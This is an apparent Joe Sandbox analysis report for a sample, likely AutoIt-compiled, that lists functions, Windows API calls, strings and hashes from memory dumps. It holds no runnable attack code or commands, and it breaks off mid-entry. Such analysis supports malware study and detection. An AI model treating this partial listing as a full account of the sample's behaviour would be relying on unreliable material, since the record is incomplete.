FindFirstFileW.KERNELBASE(?,?), ref: 003346B7
FindClose.KERNEL32(00000000), ref: 003346C7

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 337a7b0b369ba3701790018fed2c7fac275bfdbdbf27d9cda3e48cd3b3ec2486
Instruction ID: d8bc67b5a9bad71e4c0ba696910fa4d475abd412137db742ee92131d3399cb91
Opcode Fuzzy Hash: 337a7b0b369ba3701790018fed2c7fac275bfdbdbf27d9cda3e48cd3b3ec2486
Instruction Fuzzy Hash: 5DE020354105005F92116B38EC8E4EA775CDE07336F100B15F935C24F0E7B06D5086D6

Function 002E0B30 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002E0BBB
timeGetTime.WINMM ref: 002E0E76
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002E0FB3
TranslateMessage.USER32(?), ref: 002E0FC7
DispatchMessageW.USER32(?), ref: 002E0FD5
Sleep.KERNEL32(0000000A), ref: 002E0FDF
LockWindowUpdate.USER32(00000000,?,?), ref: 002E105A
DestroyWindow.USER32 ref: 002E1066
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002E1080
Sleep.KERNEL32(0000000A,?,?), ref: 003152AD
TranslateMessage.USER32(?), ref: 0031608A
DispatchMessageW.USER32(?), ref: 00316098
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003160AC

Strings

pr9, xrefs: 00315BDE
pr9, xrefs: 003153D8
@COM_EVENTOBJ, xrefs: 0031591A
@GUI_CTRLHANDLE, xrefs: 0031540E
@TRAY_ID, xrefs: 00315BB9
pr9, xrefs: 0031542D
@GUI_WINHANDLE, xrefs: 003153B9
pr9, xrefs: 00315383
@GUI_CTRLID, xrefs: 00315364

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pr9$pr9$pr9$pr9
API String ID: 4003667617-1144097107
Opcode ID: 6cf602e2cd5222451da256799be5a9455630a2e3844687ba8a170b7a930ebacd
Instruction ID: 7b6239b42ae184b236c65e3561aca087fbca20875d7bf5cf7a76920c386fdc8a
Opcode Fuzzy Hash: 6cf602e2cd5222451da256799be5a9455630a2e3844687ba8a170b7a930ebacd
Instruction Fuzzy Hash: 22B2E670618741DFD72ADF24C885BAAB7E4BF88304F54492DF489872A1DB71EC95CB82

Function 003393DF Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003391E9: __time64.LIBCMT ref: 003391F3

Part of subcall function 002D5045: _fseek.LIBCMT ref: 002D505D

__wsplitpath.LIBCMT ref: 003394BE

Part of subcall function 002F432E: __wsplitpath_helper.LIBCMT ref: 002F436E

_wcscpy.LIBCMT ref: 003394D1
_wcscat.LIBCMT ref: 003394E4
__wsplitpath.LIBCMT ref: 00339509
_wcscat.LIBCMT ref: 0033951F
_wcscat.LIBCMT ref: 00339532

Part of subcall function 0033922F: _memmove.LIBCMT ref: 00339268
Part of subcall function 0033922F: _memmove.LIBCMT ref: 00339277

_wcscmp.LIBCMT ref: 00339479

Part of subcall function 003399BE: _wcscmp.LIBCMT ref: 00339AAE
Part of subcall function 003399BE: _wcscmp.LIBCMT ref: 00339AC1

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 003396DC
_wcsncpy.LIBCMT ref: 0033974F
DeleteFileW.KERNEL32(?,?), ref: 00339785
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0033979B
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003397AC
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003397BE

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: fc86d96793903917ffe41d1e77ca2749ba9feb8d829eba5a48fd0e210e95d3f6
Instruction ID: 7536536be3fff3899d8bb24f6217f8ba483730826968bbe28cae9dc89da7da42
Opcode Fuzzy Hash: fc86d96793903917ffe41d1e77ca2749ba9feb8d829eba5a48fd0e210e95d3f6
Instruction Fuzzy Hash: 5EC14CB1D10229AFDF11DF94CC81EEEB7BCAF49310F0040AAF609E6251DB709A848F65

Function 002D71EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 002D4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,003962F8,?,002D37C0,?), ref: 002D4882

Part of subcall function 002F074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,002D72C5), ref: 002F0771

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 002D7308
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0030ECF1
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0030ED32
RegCloseKey.ADVAPI32(?), ref: 0030ED70
_wcscat.LIBCMT ref: 0030EDC9

Strings

Include, xrefs: 0030ECE8, 0030ED29
\, xrefs: 0030EDEC
\Include\, xrefs: 002D72C5
Software\AutoIt v3\AutoIt, xrefs: 002D72FE

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 7a72e32fc23828e7b30e87ffafeb08138f7cdbb255b42967604501e4a5ac361e
Instruction ID: 10d01fcd4be76a8639f0ebc435a5f116a4b182c458eddc612292615509b81550
Opcode Fuzzy Hash: 7a72e32fc23828e7b30e87ffafeb08138f7cdbb255b42967604501e4a5ac361e
Instruction Fuzzy Hash: DA7157715293019EC316EF65EC819ABBBE8FF58340F44492FF485832A0EB319958CF62

Function 002D3A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 002D3A62
LoadCursorW.USER32(00000000,00007F00), ref: 002D3A71
LoadIconW.USER32(00000063), ref: 002D3A88
LoadIconW.USER32(000000A4), ref: 002D3A9A
LoadIconW.USER32(000000A2), ref: 002D3AAC
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 002D3AD2
RegisterClassExW.USER32(?), ref: 002D3B28

Part of subcall function 002D3041: GetSysColorBrush.USER32(0000000F), ref: 002D3074
Part of subcall function 002D3041: RegisterClassExW.USER32(00000030), ref: 002D309E
Part of subcall function 002D3041: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 002D30AF
Part of subcall function 002D3041: LoadIconW.USER32(000000A9), ref: 002D30F2

Strings

0, xrefs: 002D3B06
#, xrefs: 002D3B0D
AutoIt v3, xrefs: 002D3B17

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
String ID: #$0$AutoIt v3
API String ID: 2880975755-4155596026
Opcode ID: 86166aa58e033016600b87ec17b483556c785b86d337e2405e845b86ad0a7873
Instruction ID: 5b6e136aef63cc415a56bd3f4abfa05b6944f35f506ff20b64ae3441486fbb04
Opcode Fuzzy Hash: 86166aa58e033016600b87ec17b483556c785b86d337e2405e845b86ad0a7873
Instruction Fuzzy Hash: B4214D70912304AFDB12DFA8EC0AB9D7BB8FB08751F00056BE544A62A0D7BB59548F84

Function 002D3778 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/AutoIt3ExecuteLine, xrefs: 002D38B9
b9, xrefs: 0030D44E
/ErrorStdOut, xrefs: 002D388F
/AutoIt3ExecuteScript, xrefs: 002D38CE
CMDLINE, xrefs: 002D3834
CMDLINERAW, xrefs: 002D380D
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 002D37C0
/AutoIt3OutputDebug, xrefs: 002D38A4

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$b9
API String ID: 1825951767-362774903
Opcode ID: f51dcc52b2aec3d649180d1c32e1491f99f081d11be2e4d305597ba742a86973
Instruction ID: 535e2619f41716b79adf9e73587e7e27df5823e5b57eb466a35a59359eeeb3c9
Opcode Fuzzy Hash: f51dcc52b2aec3d649180d1c32e1491f99f081d11be2e4d305597ba742a86973
Instruction Fuzzy Hash: 7FA13E718212299ADB05EBA0CC92EEEB7B8BF14340F14052BF416B7291DB759E19CF61

Function 002D3015 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 71
registrywindowclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 002D3074
RegisterClassExW.USER32(00000030), ref: 002D309E
RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 002D30AF
LoadIconW.USER32(000000A9), ref: 002D30F2

Strings

0, xrefs: 002D3056
AutoIt v3 GUI, xrefs: 002D3090
+, xrefs: 002D305D
TaskbarCreated, xrefs: 002D30A4

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Register$BrushClassClipboardColorFormatIconLoad
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 975902462-1005189915
Opcode ID: cf672f0be46e16871f8f592d31d45016076df1e658bab28c4de225cab153f0cc
Instruction ID: bd6fa2ecb727dc09ea3062663959bfb8dfc7f74f762710513bfd46c43b626f29
Opcode Fuzzy Hash: cf672f0be46e16871f8f592d31d45016076df1e658bab28c4de225cab153f0cc
Instruction Fuzzy Hash: 9A3147B184534AAFDB02DFA4EC89BC9BFF8FB09311F14456AE580A72A0D3B64585CF51

Function 002D3041 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 54
registrywindowclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 002D3074
RegisterClassExW.USER32(00000030), ref: 002D309E
RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 002D30AF
LoadIconW.USER32(000000A9), ref: 002D30F2

Strings

0, xrefs: 002D3056
AutoIt v3 GUI, xrefs: 002D3090
+, xrefs: 002D305D
TaskbarCreated, xrefs: 002D30A4

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Register$BrushClassClipboardColorFormatIconLoad
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 975902462-1005189915
Opcode ID: 1a45c8fbb2b67f96c50bcec76a4c0002fc3095f7b2d808b5ec4720d7bb288650
Instruction ID: 9c26654c3efb45b52583b5db66af922b2a0ea3c8635d752ce1d7210dddda6129
Opcode Fuzzy Hash: 1a45c8fbb2b67f96c50bcec76a4c0002fc3095f7b2d808b5ec4720d7bb288650
Instruction Fuzzy Hash: 6A21C4B1915318AFDB02DFA4EC89BDEBBF8FB08711F00452AF910A72A0D7B245448F91

Function 002DF8CF Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 002F03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 002F03D3
Part of subcall function 002F03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 002F03DB
Part of subcall function 002F03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 002F03E6
Part of subcall function 002F03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 002F03F1
Part of subcall function 002F03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 002F03F9
Part of subcall function 002F03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 002F0401

Part of subcall function 002E6259: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 002E62B4

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 002DFB2D
OleInitialize.OLE32(00000000), ref: 002DFBAA
CloseHandle.KERNEL32(00000000), ref: 003149F2

Strings

c9, xrefs: 002DF94B
\d9, xrefs: 002DF957
<g9, xrefs: 002DFA90
%6, xrefs: 002DF8F6, 002DF908, 002DFACE, 002DFBB1

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
String ID: <g9$\d9$%6$c9
API String ID: 3094916012-4037790894
Opcode ID: e2375a93eeefe13e91fe596e678c27fb4352aba4e9cdf3077d02e4bcb14a23bc
Instruction ID: f62d54303b3eb849b253a06eaebc35aee4c21043cfea3cef4a8f95c50082eaeb
Opcode Fuzzy Hash: e2375a93eeefe13e91fe596e678c27fb4352aba4e9cdf3077d02e4bcb14a23bc
Instruction Fuzzy Hash: 9D81ABB89172408FD787DFBAE9936157AECEB99348B11853B9019C7372EB364804CF51

Function 018F25F0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 018F26C1
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 018F28E7

Memory Dump Source

Source File: 00000000.00000002.1661604968.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18f0000_6ddrUd6iQo.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
Instruction ID: 21a1f45217963fa1b78497efe7c904c7b127c01eedb4060fc4ca3bef004a8d70
Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
Instruction Fuzzy Hash: 79A10774E10209EBDB14CFA8C894BEEBBB6BF48304F20855DE601BB281D7799A45CF55

Function 002D39E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002D3A15
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 002D3A36
ShowWindow.USER32(00000000,?,?), ref: 002D3A4A
ShowWindow.USER32(00000000,?,?), ref: 002D3A53

Strings

edit, xrefs: 002D3A30
AutoIt v3, xrefs: 002D3A0D, 002D3A12, 002D3A13

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 4c5869c1fcce6bfccbe5d7a628f3fefd87ed215144a6d31b9b76e8faa8c9a20a
Instruction ID: b9a5b112a74e1785b54238185e8e5978750734177776ef98868ddc237a447cdb
Opcode Fuzzy Hash: 4c5869c1fcce6bfccbe5d7a628f3fefd87ed215144a6d31b9b76e8faa8c9a20a
Instruction Fuzzy Hash: 9BF0FE716422907EFA3217276C4EE773E7DD7CAF51F00452FB944A21B0C6B61851DAB0

Function 018F23B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 148
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 018F22A0: Sleep.KERNELBASE(000001F4), ref: 018F22B1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 018F24E3

Strings

FC0ZU40N24I08ZMK, xrefs: 018F2546, 018F2549

Memory Dump Source

Source File: 00000000.00000002.1661604968.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18f0000_6ddrUd6iQo.jbxd

Similarity

API ID: CreateFileSleep
String ID: FC0ZU40N24I08ZMK
API String ID: 2694422964-1925610392
Opcode ID: 2ece5d64048ee4857672e9b7ea1af7003f777da8bf7cf58ae551258158d47e81
Instruction ID: a3a9bdc47fe472be9ea5a08272f95cd254d6765f70a53fe7c2b4b934203e680c
Opcode Fuzzy Hash: 2ece5d64048ee4857672e9b7ea1af7003f777da8bf7cf58ae551258158d47e81
Instruction Fuzzy Hash: 1B518130D14249DBEF11DBE4C859BEEBB79AF59304F004199E209BB2C0D6795B05CB65

Function 002D410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0030D5EC

Part of subcall function 002D7D2C: _memmove.LIBCMT ref: 002D7D66

_memset.LIBCMT ref: 002D418D
_wcscpy.LIBCMT ref: 002D41E1
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002D41F1

Strings

Line: , xrefs: 0030D615

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: dbf3956b37c01f3ffeced2f6aefc1623af40d87474c98f132121a99b04f5f470
Instruction ID: ecba3cbf2893ad849695e9e0826ad37df65de83f11dc61c8496ae623e28970b1
Opcode Fuzzy Hash: dbf3956b37c01f3ffeced2f6aefc1623af40d87474c98f132121a99b04f5f470
Instruction Fuzzy Hash: F231B5710293159FD722EB60DC46FDB77ECAF44304F104A1FF589922A1EB74AA58CB92

Function 002F564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 002F56AB
_memcpy_s.LIBCMT ref: 002F571D
__read_nolock.LIBCMT ref: 002F577B
__filbuf.LIBCMT ref: 002F579E
_memset.LIBCMT ref: 002F57E2

Part of subcall function 002F8D68: __getptd_noexit.LIBCMT ref: 002F8D68

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

